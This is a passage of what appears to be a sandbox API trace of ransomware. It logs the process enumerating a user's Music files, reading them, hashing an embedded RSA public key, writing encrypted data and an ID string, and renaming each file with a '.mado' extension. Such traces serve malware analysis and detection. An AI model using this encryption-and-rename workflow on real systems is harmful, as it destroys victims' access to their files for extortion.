returned 0x32b36a0 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3d0 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b682a8 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe400 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b68078 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68190 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3b8 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3e8 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80a08 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.618] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0xdff5, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0xdff5, lpOverlapped=0x0) returned 1 [0204.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.619] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xdffa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.619] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.619] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.619] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.619] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.620] CloseHandle (hObject=0x63c) returned 1 [0204.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.621] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\q88sc5F3DUn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\q88sc5f3dun.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\q88sc5F3DUn.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\q88sc5f3dun.wav.mado")) returned 1 [0204.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.621] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.622] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0396840, ftCreationTime.dwHighDateTime=0x1d5e50c, ftLastAccessTime.dwLowDateTime=0xb564f200, ftLastAccessTime.dwHighDateTime=0x1d5dce9, ftLastWriteTime.dwLowDateTime=0xb564f200, ftLastWriteTime.dwHighDateTime=0x1d5dce9, nFileSizeHigh=0x0, nFileSizeLow=0x18d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RGhn4WlYabIEdu76Vetx.wav", cAlternateFileName="RGHN4W~1.WAV")) returned 1 [0204.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.623] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RGhn4WlYabIEdu76Vetx.wav") returned=".wav" [0204.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RGhn4WlYabIEdu76Vetx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rghn4wlyabiedu76vetx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.624] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=6354) returned 1 [0204.624] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.626] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.626] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.628] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.628] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x18d2, lpOverlapped=0x0) returned 1 [0204.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.629] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.630] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.630] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.630] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.630] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.630] GetLastError () returned 0x0 [0204.630] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.630] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.630] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.630] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.630] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18d0) returned 0x3b74b68 [0204.630] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80a08 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80a50 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3e8 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.631] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b76440 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3b8 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3e8 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b76440 | out: hHeap=0x2c0000) returned 1 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3e8 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe3b8 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe3a0 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b683c0 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68078 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3b8 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3e8 | out: hHeap=0x2c0000) returned 1 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.632] GetCurrentThreadId () returned 0x600 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71fc0 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.632] GetCurrentThreadId () returned 0x600 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3e8 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 